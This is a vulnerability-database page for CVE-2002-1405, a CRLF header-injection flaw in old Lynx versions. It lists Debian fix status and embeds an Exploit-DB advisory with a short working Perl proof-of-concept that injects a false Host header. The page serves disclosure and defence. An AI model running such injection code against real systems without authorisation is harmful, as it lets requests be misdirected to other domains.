CVE-2002-1405

unknown

Published — · Modified —

💬 Discuss on Community ✚ Propose mitigation

CVSS v3

—

CVSS v4 NEW

—

not yet in upstream

VIR risk

1.0

Description

CRLF injection vulnerability in Lynx 2.8.4 and earlier allows remote attackers to inject false HTTP headers into an HTTP request that is provided on the command line, via a URL containing encoded carriage return, line feed, and other whitespace characters.

Predictions

Exploit likelihood

55%

Patch ETA

—

Heuristic predictions, AS-IS, for prioritization only.

Mitigations

No mitigations published for this CVE yet.

The vendor-content worker queues fetches as references arrive (check back in a few minutes). Or — if you've already worked around this in production — publish your fix to the community-verified tier.

✚ Propose a mitigation on Community → Mitigations published via the community go through AI scoring + 2 human reviewers + 7-day silent objection window before landing here with source_tier=community-verified.

Exploits

Public proof-of-concept code below. AS-IS, for defenders and authorised testing only.

Exploit-DB

EDB-21722 remote linux verified text · 1 KB

Ulf Harnhammar · 2002-08-19

Lynx 2.8.x - Command Line URL CRLF Injection

text exploit Source: Exploit-DB

source: https://www.securityfocus.com/bid/5499/info

A CRLF injection vulnerability has been reported for Lynx that may allow an attacker to include extra HTTP headers when viewing web pages. If Lynx is called from the command line, carriage return and line feed (CRLF) characters may be included in the specified URL. These characters are not escaped when the input is used to construct a HTTP request.

Exploitation of this flaw may allow an attacker to inject additional HTTP headers into a request. Abuse of the 'Host' header may cause the request to be served as if made to a different domain, possibly providing the attacker with more control over the content returned.

This vulnerability has been reported for Lynx versions 2.8.4rel.1, 2.8.5dev.8, 2.8.3rel.1 and 2.8.2rel.1. It is not known whether other versions are affected.

*** Links 0.9.6 and ELinks have also been reported as being vulnerable. Some versions of Links and ELinks URL encode space characters so an attacker needs to use tab characters, instead of spaces, to exploit the issue on these browsers.

#!/usr/bin/perl --
# Ulf Harnhammar 2002
# example: ./exploit www.site1.st www.site2.st
# will show www.site2.st

die "$0 hostone hosttwo\n" if @ARGV != 2;

exec('lynx "'.
     "http://$ARGV[0]/ HTTP/1.0\012".
     "Host: $ARGV[1]\012\012".
     '"');

OS impact

Debian Fixed 5 releases

Version	Status	Fixed in
trixie	Fixed	`2.8.4.1b-4`
sid	Fixed	`2.8.4.1b-4`
forky	Fixed	`2.8.4.1b-4`
bullseye	Fixed	`2.8.4.1b-4`
bookworm	Fixed	`2.8.4.1b-4`

References

https://security-tracker.debian.org/tracker/CVE-2002-1405

Community-verified mitigations for this CVE will appear above when contributors publish them.

Verify integrity in audit chain (admin only). AS-IS.